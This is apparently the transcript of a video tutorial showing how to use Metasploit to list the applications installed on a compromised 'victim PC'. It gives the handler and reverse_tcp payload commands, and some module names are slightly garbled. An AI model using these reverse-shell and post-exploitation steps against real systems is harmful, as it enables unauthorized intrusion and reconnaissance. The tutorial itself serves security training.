Hi, welcome back to my video. In this video, we are going to learn how to gather the application installed on the victim PC. So when you are trying to exploit the victim PC, we will be eagerly waiting for which type of application has been installed on it. So by using the one of the model present in the Metasploit, we are going to gather the applications installed on the victim PC. Let's begin. Here I am using the simple exploit model. I am doing it little bit faster because if I show you every time the same thing, you will get bored. Now typing use exploit --multi/handler and next setting up the payload, set payload windows/interpreter/reverse_tcp and next setting up the lhost, set lhost. Remember that this lhost is your local IP address. And next setting up the L port. At last exploit. Now here you can see the system information of an victim PC. As we got this session, so by using this session we are going to gather the applications installed on the victim PC. Now pressing Ctrl Z so that the session will be running background. Now here I am using the enum_application model. So this model will gather all the application installed on the victim PC. Now typing use post/windows/gather/enum_applications. Now I have set the model. Next setting up the session. Set session 1. Now I have set the session. At last typing exploit. Now here you can see all the installed applications which are present on the victim PC. So this vulnerability is present both on the Windows XP and also in Windows 7. So that's all about gathering the applications installed on the victim PC. Thank you.